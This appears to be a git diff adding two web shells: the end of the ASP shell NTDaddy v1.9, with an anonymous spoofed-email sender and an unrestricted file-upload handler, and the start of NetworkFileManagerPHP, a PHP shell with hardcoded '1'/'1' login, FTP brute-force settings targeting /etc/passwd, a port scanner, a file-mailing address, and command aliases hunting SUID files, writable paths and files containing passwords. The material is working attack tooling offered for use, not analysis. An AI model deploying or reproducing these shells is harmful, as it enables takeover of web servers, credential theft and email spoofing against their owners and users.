+On Error Resume Next
+Response.Write Server.HTMLEncode(oFile.ReadAll)
+oFile.Close
+Call oFileSys.DeleteFile(szTempFile, True)
+End If%>
+</pre>
+</td>
+</tr>
+</table>
+<br>
+<hr color="#ffffff">
+<br>
+<form action=ntdaddy.asp method=post>
+<form action=ntdaddy.asp method=post>
+<table border=3 cellpadding="3" cellspacing="2" bordercolor="#ffffff" width="400">
+<tr>
+<td bgcolor="#F8F8FF" colspan="2"><font color="#000000" align="left"><b>• Anonymous Email Utility</b></font></td>
+<tr>
+<td bgcolor="#F8F8FF"><font color="#000000"><b>From:</b></font> </td>
+<td><input name=From size=30 style="HEIGHT: 22px; WIDTH: 321px"></td></tr>
+<tr>
+<td bgcolor="#F8F8FF"><font color="#000000"><b>To:</b></font> </td>
+<td><input name=To size=30 style="HEIGHT: 22px; WIDTH: 321px"></td></tr>
+<tr>
+<td bgcolor="#F8F8FF"><font color="#000000"><b>Subject:</b></font> </td>
+<td><input name=Subject size=30 style="HEIGHT: 22px; WIDTH: 321px"></td></tr>
+<tr>
+<td valign="top" bgcolor="#F8F8FF"><font color="#000000"><b>Body:</b></font> </td>
+<td><textarea cols=30 name=Body rows=5 style="HEIGHT: 86px; WIDTH: 322px" wrap=virtual></textarea></td>
+</tr>
+<tr>
+<td align="right" bgcolor="#F8F8FF" colspan="2">
+<input type="submit" value="Send Mail">
+<input type="hidden" name="flag" value="1"></td>
+</tr>
+</table>
+<br>
+<hr color="#ffffff">
+<font size="#ffffff"><center>•[ <b>NTDaddy v1.9</b> ][ by obzerve ][ for the brothers of <b>fux0r inc.</b> 2k+1 ]•</b></center></font>
+</body>
+</html>
+<SCRIPT RUNAT=SERVER LANGUAGE=VBSCRIPT>
+Const IncludeType = 2 
+Dim UploadSizeLimit
+Function GetUpload()
+Dim Result
+Set Result = Nothing
+If Request.ServerVariables("REQUEST_METHOD") = "POST" Then 
+Dim CT, PosB, Boundary, Length, PosE
+CT = Request.ServerVariables("HTTP_Content_Type") 
+If LCase(Left(CT, 19)) = "multipart/form-data" Then 
+PosB = InStr(LCase(CT), "boundary=") 
+If PosB > 0 Then Boundary = Mid(CT, PosB + 9) 
+PosB = InStr(LCase(CT), "boundary=") 
+If PosB > 0 then 
+PosB = InStr(Boundary, ",")
+If PosB > 0 Then Boundary = Left(Boundary, PosB - 1)
+end if
+Length = CLng(Request.ServerVariables("HTTP_Content_Length")) 
+If "" & UploadSizeLimit <> "" Then
+UploadSizeLimit = CLng(UploadSizeLimit)
+If Length > UploadSizeLimit Then
+Request.BinaryRead (Length)
+Err.Raise 2, "GetUpload", "Upload size " & FormatNumber(Length, 0) & "B exceeds limit of " & FormatNumber(UploadSizeLimit, 0) & "B"
+Exit Function
+End If
+End If
+If Length > 0 And Boundary <> "" Then 
+Boundary = "--" & Boundary
+Dim Head, Binary
+Binary = Request.BinaryRead(Length) 
+Set Result = SeparateFields(Binary, Boundary)
+Binary = Empty 
+Else
+Err.Raise 10, "GetUpload", "Zero length request ."
+End If
+Else
+Err.Raise 11, "GetUpload", "No file sent."
+End If
+Else
+Err.Raise 1, "GetUpload", "Bad request method."
+End If
+Set GetUpload = Result
+End Function
+Function SeparateFields(Binary, Boundary)
+Dim PosOpenBoundary, PosCloseBoundary, PosEndOfHeader, isLastBoundary
+Dim Fields
+Boundary = StringToBinary(Boundary)
+PosOpenBoundary = InStrB(Binary, Boundary)
+PosCloseBoundary = InStrB(PosOpenBoundary + LenB(Boundary), Binary, Boundary, 0)
+Set Fields = CreateObject("Scripting.Dictionary")
+Do While (PosOpenBoundary > 0 And PosCloseBoundary > 0 And Not isLastBoundary)
+Dim HeaderContent, FieldContent, bFieldContent
+Dim Content_Disposition, FormFieldName, SourceFileName, Content_Type
+Dim Field, TwoCharsAfterEndBoundary
+PosEndOfHeader = InStrB(PosOpenBoundary + Len(Boundary), Binary, StringToBinary(vbCrLf + vbCrLf))
+HeaderContent = MidB(Binary, PosOpenBoundary + LenB(Boundary) + 2, PosEndOfHeader - PosOpenBoundary - LenB(Boundary) - 2)
+bFieldContent = MidB(Binary, (PosEndOfHeader + 4), PosCloseBoundary - (PosEndOfHeader + 4) - 2)
+GetHeadFields BinaryToString(HeaderContent), Content_Disposition, FormFieldName, SourceFileName, Content_Type
+Set Field = CreateUploadField() 
+Set FieldContent = CreateBinaryData()
+FieldContent.ByteArray = bFieldContent
+FieldContent.Length = LenB(bFieldContent)
+Field.Name = FormFieldName
+Field.ContentDisposition = Content_Disposition
+Field.FilePath = SourceFileName
+Field.FileName = GetFileName(SourceFileName)
+Field.ContentType = Content_Type
+Field.Length = FieldContent.Length
+Set Field.Value = FieldContent
+Fields.Add FormFieldName, Field
+TwoCharsAfterEndBoundary = BinaryToString(MidB(Binary, PosCloseBoundary + LenB(Boundary), 2))
+isLastBoundary = TwoCharsAfterEndBoundary = "--"
+If Not isLastBoundary Then 
+PosOpenBoundary = PosCloseBoundary
+PosCloseBoundary = InStrB(PosOpenBoundary + LenB(Boundary), Binary, Boundary)
+End If
+Loop
+Set SeparateFields = Fields
+End Function
+Function GetHeadFields(ByVal Head, Content_Disposition, Name, FileName, Content_Type)
+Content_Disposition = LTrim(SeparateField(Head, "content-disposition:", ";"))
+Name = (SeparateField(Head, "name=", ";")) 
+If Left(Name, 1) = """" Then Name = Mid(Name, 2, Len(Name) - 2)
+FileName = (SeparateField(Head, "filename=", ";")) 
+If Left(FileName, 1) = """" Then FileName = Mid(FileName, 2, Len(FileName) - 2)
+Content_Type = LTrim(SeparateField(Head, "content-type:", ";"))
+End Function
+Function SeparateField(From, ByVal sStart, ByVal sEnd)
+Dim PosB, PosE, sFrom
+sFrom = LCase(From)
+PosB = InStr(sFrom, sStart)
+If PosB > 0 Then
+PosB = PosB + Len(sStart)
+PosE = InStr(PosB, sFrom, sEnd)
+If PosE = 0 Then PosE = InStr(PosB, sFrom, vbCrLf)
+If PosE = 0 Then PosE = Len(sFrom) + 1
+SeparateField = Mid(From, PosB, PosE - PosB)
+Else
+SeparateField = Empty
+End If
+End Function
+Function GetFileName(FullPath)
+Dim Pos, PosF
+PosF = 0
+For Pos = Len(FullPath) To 1 Step -1
+Select Case Mid(FullPath, Pos, 1)
+Case "/", "\": PosF = Pos + 1: Pos = 0
+End Select
+Next
+If PosF = 0 Then PosF = 1
+GetFileName = Mid(FullPath, PosF)
+End Function
+Function BinaryToString(Binary)
+dim cl1, cl2, cl3, pl1, pl2, pl3
+Dim L
+cl1 = 1
+cl2 = 1
+cl3 = 1
+L = LenB(Binary)
+Do While cl1<=L
+pl3 = pl3 & Chr(AscB(MidB(Binary,cl1,1)))
+cl1 = cl1 + 1
+cl3 = cl3 + 1
+if cl3>300 then
+pl2 = pl2 & pl3
+pl3 = ""
+cl3 = 1
+cl2 = cl2 + 1
+if cl2>200 then
+pl1 = pl1 & pl2
+pl2 = ""
+cl2 = 1
+End If
+End If
+Loop
+BinaryToString = pl1 & pl2 & pl3
+End Function
+Function BinaryToStringold(Binary)
+Dim I, S
+For I = 1 To LenB(Binary)
+S = S & Chr(AscB(MidB(Binary, I, 1)))
+Next
+BinaryToString = S
+End Function
+Function StringToBinary(String)
+Dim I, B
+For I=1 to len(String)
+B = B & ChrB(Asc(Mid(String,I,1)))
+Next
+StringToBinary = B
+End Function
+Function vbsSaveAs(FileName, ByteArray)
+Dim FS, TextStream
+Set FS = CreateObject("Scripting.FileSystemObject")
+Set TextStream = FS.CreateTextFile(FileName)
+TextStream.Write BinaryToString(ByteArray) 
+TextStream.Close
+End Function
+</SCRIPT>
+<SCRIPT RUNAT=SERVER LANGUAGE=JSCRIPT>
+function CreateUploadField(){ return new uf_Init() }
+function uf_Init(){
+this.Name = null
+this.ContentDisposition = null
+this.FileName = null
+this.FilePath = null
+this.ContentType = null
+this.Value = null
+this.Length = null
+}
+function CreateBinaryData(){ return new bin_Init() }
+function bin_Init(){
+this.ByteArray = null
+this.Length = null
+this.String = jsBinaryToString
+this.SaveAs = jsSaveAs
+}
+function jsBinaryToString(){
+return BinaryToString(this.ByteArray)
+}
+function jsSaveAs(FileName){
+return vbsSaveAs(FileName, this.ByteArray)
+}
+</SCRIPT>
+<%
+If Request.ServerVariables("REQUEST_METHOD") = "POST" Then 
+Set Fields = GetUpload()
+FilePath = Server.MapPath(".") & "\" & Fields("File1").FileName
+Fields("File1").Value.SaveAs FilePath
+End If
+%>
+<%
+Else
+Dim anonFrom,anonTo,anonSubj,anonBody
+anonFrom = request.form("From")
+anonTo = request.form("To")
+anonSubj = request.form("Subject")
+anonBody = request.form("Body")
+Set objMail = CreateObject("CDONTS.NewMail")
+objMail.From=anonFrom
+objMail.To=anonTo
+objMail.Subject=anonSubj
+objMail.Body=anonBody
+intReturn=objMail.Send()
+%>
+<html>
+<head><title>|[NTDaddy v1.9 | anon email]</title></head>
+<h1>Message sent successfully!</h1><br><br><br>
+<table border=0 cellpadding="0" cellspacing="3">
+<tr>
+<td>
+<input type='button' value='Back' onclick=history.back()> </td>
+<td>
+<h2>[NTDaddy v1.9 - obzerve | fux0r inc.]</h2> </td>
+</tr>
+</table>
+</html>
+<%
+End if
+%>
+
+
+
diff --git a/php/NetworkFileManagerPHP.php b/php/NetworkFileManagerPHP.php
new file mode 100644
index 0000000..a0cf326
--- /dev/null
+++ b/php/NetworkFileManagerPHP.php
@@ -0,0 +1,5603 @@
+<?
+
+if (ini_get('register_globals') != '1') {
+
+   if (!empty($HTTP_POST_VARS))
+
+    extract($HTTP_POST_VARS);
+
+
+
+  if (!empty($HTTP_GET_VARS))
+
+    extract($HTTP_GET_VARS);
+
+  if (!empty($HTTP_SERVER_VARS))
+
+    extract($HTTP_SERVER_VARS);
+
+}
+
+
+
+$use_md5=0; // Define use of MD5 crypt algoritm //
+
+$uname="1";
+
+$upass="1";
+
+
+
+
+
+
+if ($action != "download" && $action != "view" ):
+
+?>
+
+
+
+<?
+
+
+
+/* Define your email for file send function*/
+
+$demail ="effes2004@gmail.com";
+
+
+
+/* config here */
+
+$title="NetworkFileManagerPHP for channel #hack.ru";
+
+$ver="1.7.private ([final_english_release])";
+
+$sob="Belongs to <b><u>revers</u></b>";
+
+$id="1337";
+
+
+
+/* FTP-bruteforce */
+
+$filename="/etc/passwd";
+
+$ftp_server="localhost";
+
+/* port scanner */
+
+$min="1";
+
+$max="65535";
+
+
+
+/* Aliases */
+
+$aliases=array(
+
+/* find all SUID files */
+
+'find / -type f -perm -04000 -ls' => 'find all suid files'  ,
+
+/* find all SGID files */
+
+'find / -type f -perm -02000 -ls' => 'find all sgid files',
+
+/* find all config.inc.php files */
+
+'find / -type f -name config.inc.php' => 'find all config.inc.php files',
+
+/* find accesseable writeable directories and files*/
+
+'find / -perm -2 -ls' => 'find writeable directories and files',
+
+'ls -la' => 'Current directory listing with rights access',
+
+'find / -name *.php | xargs grep -li password' =>'searsh all file .php word password'
+
+
+
+);
+
+
+
+/* ports and services names */
+
+$port[1] = "tcpmux (TCP Port Service Multiplexer)";
+
+$port[2] = "Management Utility";
+
+$port[3] = "Compression Process";
+
+$port[5] = "rje (Remote Job Entry)";
+
+$port[7] = "echo";
+
+$port[9] = "discard";
+
+$port[11] = "systat";
+
+$port[13] = "daytime";
+
+$port[15] = "netstat";
+
+$port[17] = "quote of the day";
+
+$port[18] = "send/rwp";
+
+$port[19] = "character generator";
+
+$port[20] = "ftp-data";
+
+$port[21] = "ftp";
+
+$port[22] = "ssh, pcAnywhere";
+
+$port[23] = "Telnet";
+
+$port[25] = "SMTP (Simple Mail Transfer)";
+
+$port[27] = "ETRN (NSW User System FE)";
+
+$port[29] = "MSG ICP";
+
+$port[31] = "MSG Authentication";
+
+$port[33] = "dsp (Display Support Protocol)";
+
+$port[37] = "time";
+
+$port[38] = "RAP (Route Access Protocol)";
+
+$port[39] = "rlp (Resource Location Protocol)";
+
+$port[41] = "Graphics";
+
+$port[42] = "nameserv, WINS";
+
+$port[43] = "whois, nickname";
+
+$port[44] = "MPM FLAGS Protocol";
+
+$port[45] = "Message Processing Module [recv]";
+
+$port[46] = "MPM [default send]";
+
+$port[47] = "NI FTP";
+
+$port[48] = "Digital Audit Daemon";
+
+$port[49] = "TACACS, Login Host Protocol";
+
+$port[50] = "RMCP, re-mail-ck";
+
+$port[53] = "DNS";
+
+$port[57] = "MTP (any private terminal access)";
+
+$port[59] = "NFILE";
+
+$port[60] = "Unassigned";
+
+$port[61] = "NI MAIL";
+
+$port[62] = "ACA Services";
+
+$port[63] = "whois++";
+
+$port[64] = "Communications Integrator (CI)";
+
+$port[65] = "TACACS-Database Service";
+
+$port[66] = "Oracle SQL*NET";
+
+$port[67] = "bootps (Bootstrap Protocol Server)";
+
+$port[68] = "bootpd/dhcp (Bootstrap Protocol Client)";
+
+$port[69] = "Trivial File Transfer Protocol (tftp)";
+
+$port[70] = "Gopher";
+
+$port[71] = "Remote Job Service";
+
+$port[72] = "Remote Job Service";
+
+$port[73] = "Remote Job Service";
+
+$port[74] = "Remote Job Service";
+
+$port[75] = "any private dial out service";
+
+$port[76] = "Distributed External Object Store";
+
+$port[77] = "any private RJE service";
+
+$port[78] = "vettcp";
+
+$port[79] = "finger";
+
+$port[80] = "World Wide Web HTTP";
+
+$port[81] = "HOSTS2 Name Serve";
+
+$port[82] = "XFER Utility";
+
+$port[83] = "MIT ML Device";
+
+$port[84] = "Common Trace Facility";
+
+$port[85] = "MIT ML Device";
+
+$port[86] = "Micro Focus Cobol";
+
+$port[87] = "any private terminal link";
+
+$port[88] = "Kerberos, WWW";
+
+$port[89] = "SU/MIT Telnet Gateway";
+
+$port[90] = "DNSIX Securit Attribute Token Map";
+
+$port[91] = "MIT Dover Spooler";
+
+$port[92] = "Network Printing Protocol";
+
+$port[93] = "Device Control Protocol";
+
+$port[94] = "Tivoli Object Dispatcher";
+
+$port[95] = "supdup";
+
+$port[96] = "DIXIE";
+
+$port[98] = "linuxconf";
+
+$port[99] = "Metagram Relay";
+
+$port[100] = "[unauthorized use]";
+
+$port[101] = "HOSTNAME";
+
+$port[102] = "ISO, X.400, ITOT";
+
+$port[103] = "Genesis Point-to&#14144;&#429;oi&#65535;&#65535; T&#0;&#0;ns&#0;&#0;et";
+
+$port[104] = "ACR-NEMA Digital Imag. & Comm. 300";
+
+$port[105] = "CCSO name server protocol";
+
+$port[106] = "poppassd";
+
+$port[107] = "Remote Telnet Service";
+
+$port[108] = "SNA Gateway Access Server";
+
+$port[109] = "POP2";
+
+$port[110] = "POP3";
+
+$port[111] = "Sun RPC Portmapper";
+
+$port[112] = "McIDAS Data Transmission Protocol";
+
+$port[113] = "Authentication Service";
+
+$port[115] = "sftp (Simple File Transfer Protocol)";
+
+$port[116] = "ANSA REX Notify";
+
+$port[117] = "UUCP Path Service";
+
+$port[118] = "SQL Services";
+
+$port[119] = "NNTP";
+
+$port[120] = "CFDP";
+
+$port[123] = "NTP";
+
+$port[124] = "SecureID";
+
+$port[129] = "PWDGEN";
+
+$port[133] = "statsrv";
+
+$port[135] = "loc-srv/epmap";
+
+$port[137] = "netbios-ns";
+
+$port[138] = "netbios-dgm (UDP)";
+
+$port[139] = "NetBIOS";
+
+$port[143] = "IMAP";
+
+$port[144] = "NewS";
+
+$port[150] = "SQL-NET";
+
+$port[152] = "BFTP";
+
+$port[153] = "SGMP";
+
+$port[156] = "SQL Service";
+
+$port[161] = "SNMP";
+
+$port[175] = "vmnet";
+
+$port[177] = "XDMCP";
+
+$port[178] = "NextStep Window Server";
+
+$port[179] = "BGP";
+
+$port[180] = "SLmail admin";
+
+$port[199] = "smux";
+
+$port[210] = "Z39.50";
+
+$port[213] = "IPX";
+
+$port[218] = "MPP";
+
+$port[220] = "IMAP3";
+
+$port[256] = "RAP";
+
+$port[257] = "Secure Electronic Transaction";
+
+$port[258] = "Yak Winsock Personal Chat";
+
+$port[259] = "ESRO";
+
+$port[264] = "FW1_topo";
+
+$port[311] = "Apple WebAdmin";
+
+$port[350] = "MATIP type A";
+
+$port[351] = "MATIP type B";
+
+$port[363] = "RSVP tunnel";
+
+$port[366] = "ODMR (On-Demand Mail Relay)";
+
+$port[371] = "Clearcase";
+
+$port[387] = "AURP (AppleTalk Update-Based Routing Protocol)";
+
+$port[389] = "LDAP";
+
+$port[407] = "Timbuktu";
+
+$port[427] = "Server Location";
+
+$port[434] = "Mobile IP";
+
+$port[443] = "ssl";
+
+$port[444] = "snpp, Simple Network Paging Protocol";
+
+$port[445] = "SMB";
+
+$port[458] = "QuickTime TV/Conferencing";
+
+$port[468] = "Photuris";
+
+$port[475] = "tcpnethaspsrv";
+
+$port[500] = "ISAKMP, pluto";
+
+$port[511] = "mynet-as";
+
+$port[512] = "biff, rexec";
+
+$port[513] = "who, rlogin";
+
+$port[514] = "syslog, rsh";
+
+$port[515] = "lp, lpr, line printer";
+
+$port[517] = "talk";
+
+$port[520] = "RIP (Routing Information Protocol)";
+
+$port[521] = "RIPng";
+
+$port[522] = "ULS";
+
+$port[531] = "IRC";
+
+$port[543] = "KLogin, AppleShare over IP";
+
+$port[545] = "QuickTime";
+
+$port[548] = "AFP";
+
+$port[554] = "Real Time Streaming Protocol";
+
+$port[555] = "phAse Zero";
+
+$port[563] = "NNTP over SSL";
+
+$port[575] = "VEMMI";
+
+$port[581] = "Bundle Discovery Protocol";
+
+$port[593] = "MS-RPC";
+
+$port[608] = "SIFT/UFT";
+
+$port[626] = "Apple ASIA";
+
+$port[631] = "IPP (Internet Printing Protocol)";
+
+$port[635] = "RLZ DBase";
+
+$port[636] = "sldap";
+
+$port[642] = "EMSD";
+
+$port[648] = "RRP (NSI Registry Registrar Protocol)";
+
+$port[655] = "tinc";
+
+$port[660] = "Apple MacOS Server Admin";
+
+$port[666] = "Doom";
+
+$port[674] = "ACAP";
+
+$port[687] = "AppleShare IP Registry";
+
+$port[700] = "buddyphone";
+
+$port[705] = "AgentX for SNMP";
+
+$port[901] = "swat, realsecure";
+
+$port[993] = "s-imap";
+
+$port[995] = "s-pop";
+
+$port[1024] = "Reserved";
+
+$port[1025] = "network blackjack";
+
+$port[1062] = "Veracity";
+
+$port[1080] = "SOCKS";
+
+$port[1085] = "WebObjects";
+
+$port[1227] = "DNS2Go";
+
+$port[1243] = "SubSeven";
+
+$port[1338] = "Millennium Worm";
+
+$port[1352] = "Lotus Notes";
+
+$port[1381] = "Apple Network License Manager";
+
+$port[1417] = "Timbuktu Service 1 Port";
+
+$port[1418] = "Timbuktu Service 2 Port";
+
+$port[1419] = "Timbuktu Service 3 Port";
+
+$port[1420] = "Timbuktu Service 4 Port";
+
+$port[1433] = "Microsoft SQL Server";
+
+$port[1434] = "Microsoft SQL Monitor";
+
+$port[1477] = "ms-sna-server";
+
+$port[1478] = "ms-sna-base";
+
+$port[1490] = "insitu-conf";
+
+$port[1494] = "Citrix ICA Protocol";
+
+$port[1498] = "Watcom-SQL";
+
+$port[1500] = "VLSI License Manager";
+
+$port[1503] = "T.120";
+
+$port[1521] = "Oracle SQL";
+
+$port[1522] = "Ricardo North America License Manager";
+
+$port[1524] = "ingres";
+
+$port[1525] = "prospero";
+
+$port[1526] = "prospero";
+
+$port[1527] = "tlisrv";
+
+$port[1529] = "oracle";
+
+$port[1547] = "laplink";
+
+$port[1604] = "Citrix ICA, MS Terminal Server";
+
+$port[1645] = "RADIUS Authentication";
+
+$port[1646] = "RADIUS Accounting";
+
+$port[1680] = "Carbon Copy";
+
+$port[1701] = "L2TP/LSF";
+
+$port[1717] = "Convoy";
+
+$port[1720] = "H.323/Q.931";
+
+$port[1723] = "PPTP control port";
+
+$port[1731] = "MSICCP";
+
+$port[1755] = "Windows Media .asf";
+
+$port[1758] = "TFTP multicast";
+
+$port[1761] = "cft-0";
+
+$port[1762] = "cft-1";
+
+$port[1763] = "cft-2";
+
+$port[1764] = "cft-3";
+
+$port[1765] = "cft-4";
+
+$port[1766] = "cft-5";
+
+$port[1767] = "cft-6";
+
+$port[1808] = "Oracle-VP2";
+
+$port[1812] = "RADIUS server";
+
+$port[1813] = "RADIUS accounting";
+
+$port[1818] = "ETFTP";
+
+$port[1973] = "DLSw DCAP/DRAP";
+
+$port[1985] = "HSRP";
+
+$port[1999] = "Cisco AUTH";
+
+$port[2001] = "glimpse";
+
+$port[2049] = "NFS";
+
+$port[2064] = "distributed.net";
+
+$port[2065] = "DLSw";
+
+$port[2066] = "DLSw";
+
+$port[2106] = "MZAP";
+
+$port[2140] = "DeepThroat";
+
+$port[2301] = "Compaq Insight Management Web Agents";
+
+$port[2327] = "Netscape Conference";
+
+$port[2336] = "Apple UG Control";
+
+$port[2427] = "MGCP gateway";
+
+$port[2504] = "WLBS";
+
+$port[2535] = "MADCAP";
+
+$port[2543] = "sip";
+
+$port[2592] = "netrek";
+
+$port[2727] = "MGCP call agent";
+
+$port[2628] = "DICT";
+
+$port[2998] = "ISS Real Secure Console Service Port";
+
+$port[3000] = "Firstclass";
+
+$port[3001] = "Redwood Broker";
+
+$port[3031] = "Apple AgentVU";
+
+$port[3128] = "squid";
+
+$port[3130] = "ICP";
+
+$port[3150] = "DeepThroat";
+
+$port[3264] = "ccmail";
+
+$port[3283] = "Apple NetAssitant";
+
+$port[3288] = "COPS";
+
+$port[3305] = "ODETTE";
+
+$port[3306] = "mySQL";
+
+$port[3389] = "RDP Protocol (Terminal Server)";
+
+$port[3521] = "netrek";
+
+$port[4000] = "icq, command-n-conquer and shell nfm";
+
+$port[4321] = "rwhois";
+
+$port[4333] = "mSQL";
+
+$port[4444] = "KRB524";
+
+$port[4827] = "HTCP";
+
+$port[5002] = "radio free ethernet";
+
+$port[5004] = "RTP";
+
+$port[5005] = "RTP";
+
+$port[5010] = "Yahoo! Messenger";
+
+$port[5050] = "multimedia conference control tool";
+
+$port[5060] = "SIP";
+
+$port[5150] = "Ascend Tunnel Management Protocol";
+
+$port[5190] = "AIM";
+
+$port[5500] = "securid";
+
+$port[5501] = "securidprop";
+
+$port[5423] = "Apple VirtualUser";
+
+$port[5555] = "Personal Agent";
+
+$port[5631] = "PCAnywhere data";
+
+$port[5632] = "PCAnywhere";
+
+$port[5678] = "Remote Replication Agent Connection";
+
+$port[5800] = "VNC";
+
+$port[5801] = "VNC";
+
+$port[5900] = "VNC";
+
+$port[5901] = "VNC";
+
+$port[6000] = "X Windows";
+
+$port[6112] = "BattleNet";
+
+$port[6502] = "Netscape Conference";
+
+$port[6667] = "IRC";
+
+$port[6670] = "VocalTec Internet Phone, DeepThroat";
+
+$port[6699] = "napster";
+
+$port[6776] = "Sub7";
+
+$port[6970] = "RTP";
+
+$port[7007] = "MSBD, Windows Media encoder";
+
+$port[7070] = "RealServer/QuickTime";
+
+$port[7777] = "cbt";
+
+$port[7778] = "Unreal";
+
+$port[7648] = "CU-SeeMe";
+
+$port[7649] = "CU-SeeMe";
+
+$port[8000] = "iRDMI/Shoutcast Server";
+
+$port[8010] = "WinGate 2.1";
+
+$port[8080] = "HTTP";
+
+$port[8181] = "HTTP";
+
+$port[8383] = "IMail WWW";
+
+$port[8875] = "napster";
+
+$port[8888] = "napster";
+
+$port[8889] = "Desktop Data TCP 1";
+
+$port[8890] = "Desktop Data TCP 2";
+
+$port[8891] = "Desktop Data TCP 3: NESS application";
+
+$port[8892] = "Desktop Data TCP 4: FARM product";
+
+$port[8893] = "Desktop Data TCP 5: NewsEDGE/Web application";
+
+$port[8894] = "Desktop Data TCP 6: COAL application";
+
+$port[9000] = "CSlistener";
+
+$port[10008] = "cheese worm";
+
+$port[11371] = "PGP 5 Keyserver";
+
+$port[13223] = "PowWow";
+
+$port[13224] = "PowWow";
+
+$port[14237] = "Palm";
+
+$port[14238] = "Palm";
+
+$port[18888] = "LiquidAudio";
+
+$port[21157] = "Activision";
+
+$port[22555] = "Vocaltec Web Conference";
+
+$port[23213] = "PowWow";
+
+$port[23214] = "PowWow";
+
+$port[23456] = "EvilFTP";
+
+$port[26000] = "Quake";
+
+$port[27001] = "QuakeWorld";
+
+$port[27010] = "Half-Life";
+
+$port[27015] = "Half-Life";
+
+$port[27960] = "QuakeIII";
+
+$port[30029] = "AOL Admin";
+
+$port[31337] = "Back Orifice";
+
+$port[32777] = "rpc.walld";
+
+$port[45000] = "Cisco NetRanger postofficed";
+
+$port[32773] = "rpc bserverd";
+
+$port[32776] = "rpc.spray";
+
+$port[32779] = "rpc.cmsd";
+
+$port[38036] = "timestep";
+
+$port[40193] = "Novell";
+
+$port[41524] = "arcserve discovery";
+
+
+
+/* finished config, here goes the design */
+
+$meta = "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-1251\">";
+
+$style=<<<style
+
+<style>
+
+a.   {
+
+color: #ffffcc;
+
+text-decoration:none;
+
+font-family: Times New Roman;
+
+font-weight: bold;
+
+     }
+
+a.menu:hover   {
+
+color: #FF0000;
+
+font-family: Times New Roman;
+
+text-decoration: none
+
+font-weight: bold;
+
+          }
+
+a   {
+
+color: #000000;
+
+text-decoration:none;
+
+font-family: Tahoma;
+
+font-size: 11px;
+
+     }
+
+a:hover   {
+
+color: #184984;
+
+font-family: Tahoma;
+
+text-decoration: underline
+
+font-size: 11px;
+
+          }
+
+td.up{
+
+color: #996600;
+
+font-family: Verdana;
+
+font-weight: normal;
+
+font-size: 11px;
+
+}
+
+.pagetitle {
+
+font-family: Arial, Helvetica, sans-serif;
+
+color: #FFFFFF;
+
+text-decoration: none;
+
+font-size: 12px
+
+}
+
+.alert   {
+
+color: #FF0000;
+
+font-family: Tahoma;
+
+font-size: 11px;
+
+          }
+
+.button1 {
+
+font-size:11px;
+
+font-weight:bold;
+
+font-family:Verdana;
+
+background:#184984;
+
+border:1px solid #000000; cursor:hand; color:#ffffcc;
+
+}
+
+.inputbox {font-size:11px; font-family:Verdana, Arial, Helvetica, sans-serif; background:#EBEFF6; color:#213B72; border:1px solid #000000; font-weight:normal}
+
+.submit_button {  font-family: Arial, Helvetica, sans-serif; font-size: 12px; color: #FFFFFF; background-color: #999999;}
+
+.textbox { background: White; border: 1px #000000 solid; color: #000099; font-family: "Courier New", Courier, mono; font-size: 11px; scrollbar-face-color: #CCCCCC; scrollbar-shadow-color: #FFFFFF; scrollbar-highlight-color: #FFFFFF; scrollbar-3dlight-color: #FFFFFF; scrollbar-darkshadow-color: #FFFFFF; scrollbar-track-color: #FFFFFF; scrollbar-arrow-color: #000000 ; border-color: #000000 solid}
+
+b {  font-weight: bold}
+
+table {  font-family: Arial, Helvetica, sans-serif; font-size: 11px; color: #184984}
+
+</style>
+
+style;
+
+
+
+/* table styles */
+
+$style1=<<<table
+
+STYLE="background:#184984" onmouseover="this.style.backgroundColor = '#D5EBD7'" onmouseout="this.style.backgroundColor = '#184984'"
+
+table;
+
+$style2=<<<table_file
+
+STYLE="background:#184984" onmouseover="this.style.backgroundColor = '#D5EBD7'" onmouseout="this.style.backgroundColor = '#184984'"
+
+table_file;
+
+$style3=<<<table_dir
+
+STYLE="background:#28BECA" onmouseover="this.style.backgroundColor = '#FFFFCC'" onmouseout="this.style.backgroundColor = '#28BECA'"
+
+table_dir;
+
+$style4=<<<table_files
+
+STYLE="background:#DCDCB0" onmouseover="this.style.backgroundColor = '#28BECA'" onmouseout="this.style.backgroundColor = '#DCDCB0'"
+
+table_files;
+
+$style_button=<<<button
+
+STYLE="background:#184984" onmouseover="this.style.backgroundColor = '#D5EBD7'" onmouseout="this.style.backgroundColor = '#184984'"
+
+button;
+
+$style_open=<<<open
+
+STYLE="background:#006200" onmouseover="this.style.backgroundColor = '#006200'" onmouseout="this.style.backgroundColor = '#006200'"
+
+open;
+
+$style_close=<<<close
+
+STYLE="background:#FF0000" onmouseover="this.style.backgroundColor = '#FF0000'" onmouseout="this.style.backgroundColor = '#FF0000'"
+
+close;
+
+$ins=<<<ins
+
+<script>
+
+function ins(text){
+
+document.hackru.chars_de.value+=text;
+
+document.hackru.chars_de.focus();
+
+}
+
+</script>
+
+ins;
+
+
+
+/* send form */
+
+$form = "
+
+<br>     <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+   <tr>
+
+  <td align=center class=pagetitle colspan=2><b>Help for NetworkFileManagerPHP 1.7</b></font></b></td>
+
+  </tr>  <form method='POST' action='$PHP_SELF?action=feedback&status=ok'>
+
+     <tr>
+
+  <td colspan=2 align=center class=pagetitle><b>Feedback:</b></td>
+
+  </tr>
+
+    <tr>
+
+      <td width='250' class=pagetitle><b>Your name:</b></td>
+
+      <td width='250' class=pagetitle>
+
+        <input type='text' name='name' size='40' class='inputbox'></td>
+
+      </tr>
+
+    <tr>
+
+      <td width='250' class=pagetitle><b>Email:</b></td>
+
+      <td width='250'><input type='text' name='email' size='40' class='inputbox'></td>
+
+    </tr>
+
+
+
+  <tr>
+
+  <td colspan=2 align=center class=pagetitle><b>
+
+  Your questions and wishes:
+
+  </b></font></b></td>
+
+  </tr>
+
+  <tr>
+
+      <td width=500 colspan=2><textarea rows='4' name='pole' cols='84' class='inputbox' ></textarea></td></tr>
+
+  <tr>
+
+  <td align=right><input type='submit' value='GO' name='B1' class=button1 $style_button></td>
+
+      <td align=left><input type='reset' value='Clear' name='B2' class=button1 $style_button></td>
+
+      </tr>
+
+</form></table><br>
+
+";
+
+
+
+
+
+
+
+/* HTML Form */
+
+$HTML=<<<html
+
+<html>
+
+<head>
+
+<title>$title $ver</title>
+
+$meta
+
+$style
+
+$ins
+
+</head>
+
+
+
+<body bgcolor=#E0F7FF leftmargin=0 topmargin=0 marginwidth=0 marginheight=0>
+
+<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
